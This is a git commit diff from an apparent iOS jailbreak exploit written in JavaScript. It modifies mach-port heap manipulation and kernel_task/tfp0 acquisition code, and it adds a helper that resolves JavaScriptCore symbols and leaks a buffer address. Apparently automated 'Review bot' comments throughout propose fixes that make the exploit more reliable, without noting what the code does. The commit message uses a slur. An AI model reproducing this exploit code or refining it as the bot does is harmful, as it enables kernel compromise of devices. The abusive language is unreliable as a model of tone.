| author | spv420 <spv@spv.sh> | 2022-07-31 04:30:23 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-07-31 04:30:23 -0400 |
| commit | b88cb06e11df31cb7f079d2c78c42b7fced7bb17 (patch) | |
| tree | eb0fda7835e6c10795f1873aee7384408a37f55c | |
| parent | eb21089efd298dfec49ebd2836105f5d900d50ae (diff) | |
fucking retard
| -rw-r--r-- | .gitignore | 4 | ||||
| -rwxr-xr-x | src/stage4/kexp/exploit.js | 17 | ||||
| -rw-r--r-- | src/stage4/main.js | 14 |
3 files changed, 32 insertions, 3 deletions
@@ -18,4 +18,6 @@ racoon.conf
 .vscode
exp_unmin.js
-stage4.js
\ No newline at end of file
+stage4.js
+
+.irecovery
\ No newline at end of file
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index aa10126..19d2623 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -289,13 +289,19 @@ function send_ports(target, payload, num, number_port_descs) {
 function release_port_ptrs(port) {
 // var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
+ p0laris_log("fuck");
 var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
-// p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
+ p0laris_log("fuck");
+ // p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
 var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ p0laris_log("fuck");
 if (ret != KERN_SUCCESS) {
 p0laris_log("mach_recv %d %s\n", ret, mach_error_string(ret));
+ p0laris_log("fuck2");
 }
+ p0laris_log("fuck");
 shit_heap_free(req);
+ p0laris_log("fuck");
 }
 function r3gister(task, init_port_set, real_count, fake_count) {
@@ -463,6 +469,9 @@ again: while (true) {
 sched_yield();
 for (var i = 0; i < PORTS_NUM; i++) {
 // for (var i = 0; i < 8; i++) {
+ if (i % 4 == 0) {
+ p0laris_log("release_port_ptrs %d\n", i);
+ }
 release_port_ptrs(read_u32(fp + (i << 2)));
 }
@@ -544,7 +553,7 @@ again: while (true) {
 p0laris_log("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
 p0laris_log("fuck\n");
 call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
- if (kernel_task_addr === 0xffffffff) {
+ if (read_u32(kernel_task_addr) === 0xffffffff) {
 continue again;
 }
 p0laris_log("kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
@@ -552,6 +561,10 @@ again: while (true) {
 p0laris_log("get lucky\n");
+ while (true) {
+ sleep(3600);
+ }
+
 return tfp0;
 }
 }
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 53a74ec..af2ed69 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
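Review bot: The five `p0laris_log("fuck")` calls added to release_port_ptrs are identical and, unlike every other p0laris_log call in this hunk, have no trailing `\n`, so the trace cannot tell which step was reached and the markers run together in the log. If they are to stay, give each a distinct newline-terminated message, e.g. `p0laris_log("release_port_ptrs: after alloc\n");` and `p0laris_log("release_port_ptrs: mach_msg ret=%d\n", ret);`; otherwise drop them before merging. Separately, on a failed mach_msg the function only logs, frees req and returns nothing, so the PORTS_NUM loop in the next hunk cannot distinguish a port whose receive failed from one that was released; a `return ret;` checked by the caller would make that visible. The whole function is inside this hunk.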
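Review bot: `if (i % 4 == 0)` uses loose equality while the same file compares with `===` two hunks down; `if (i % 4 === 0) {` keeps the style consistent and, with `i` a loop counter, changes nothing at runtime. The loop sits inside the `again:` while loop whose start and end are outside the hunk.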
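Review bot: The corrected condition makes `read_u32(kernel_task_addr)` the third read of the same word in four lines (the `call4arg(... puts ...)` line above and the `p0laris_log` line below each read it again), so the value that is printed and the value that is branched on are not guaranteed to be the same if anything writes that slot in between. Read it once and reuse it: `var kt = read_u32(kernel_task_addr);` before the puts call, `if (kt === 0xffffffff) { continue again; }`, and format `kt` in both log lines. Only 0xffffffff is treated as failure; whether a zero value can also land there (e.g. a slot that was never written) can't be told from this hunk, and if it can, `kt === 0 || kt === 0xffffffff` is the safer test. The enclosing `again:` loop starts and ends outside the hunk.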
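Review bot: The added `while (true) { sleep(3600); }` never exits, so the `return tfp0;` that follows it is unreachable and get_kernel_task() never returns; in main.js that means `var tfp0 = get_kernel_task();` and the `__p0laris_LOG_END__` syslog are never reached. If this is a deliberate parking loop so the device state can be inspected after the kernel task is obtained, say so in a comment and gate it behind an explicit debug flag, e.g. `if (PARK_AFTER_TFP0) { while (true) { sleep(3600); } }`, so it cannot ship by accident; otherwise remove it before merging. The enclosing function starts outside the hunk.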
@@ -12,6 +12,13 @@ var SOCK_DGRAM = 2;
 var SOCK_DGRAM = 2;
 var IPPROTO_UDP = 17;
+function prep_shit() {
+ string_ref = scall("JSStringCreateWithUTF8CString", "victim");
+ global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
+ jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
+ large_buf_ptr = leak_vec(large_buf);
+}
+
 function main() {
 syslog(LOG_SYSLOG, "__p0laris_LOG_START__");
 p0laris_log("[*] we out here");
@@ -24,6 +31,13 @@ function main() {
 printf("test");
+ var dyld_shc_slide = get_dyld_shc_slide();
+
+ sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
+ sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
+ sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
+ prep_shit();
+
 var tfp0 = get_kernel_task();
 syslog(LOG_SYSLOG, "__p0laris_LOG_END__"); |
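Review bot: prep_shit() assigns `string_ref`, `global_object`, `jsobj_addr` and `large_buf_ptr` without `var`, so unless those four are declared somewhere not visible here they become implicit globals (or a ReferenceError under strict mode). Declare them at file scope next to `SOCK_DGRAM`/`IPPROTO_UDP`, `var string_ref, global_object, jsobj_addr, large_buf_ptr;`, so the hand-off from prep_shit() to whatever reads them later is explicit. The expression `read_u32(slid + reserve_addr + 0x44)` is evaluated in two consecutive calls; reading it once into a local, `var ctx = read_u32(slid + reserve_addr + 0x44);`, drops the second read and makes clear both calls are meant to see the same value. A one-line comment above the function stating what it prepares would help since the name does not; from the calls it appears to resolve the `victim` property of the context's global object and leak the address of `large_buf`, but confirm that before writing it down.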
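Review bot: The result of `get_dyld_shc_slide()` feeds the three `sym_cache` entries unchecked, and prep_shit() immediately calls through two of them via `scall`, so if the slide lookup can fail the cached addresses are wrong and those calls jump to garbage. Its failure value is not visible here; if it has one, bail out before touching the cache, e.g. `if (dyld_shc_slide === <failure value>) { p0laris_log("dyld shared cache slide lookup failed\n"); return; }`. main() continues past the end of the hunk.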
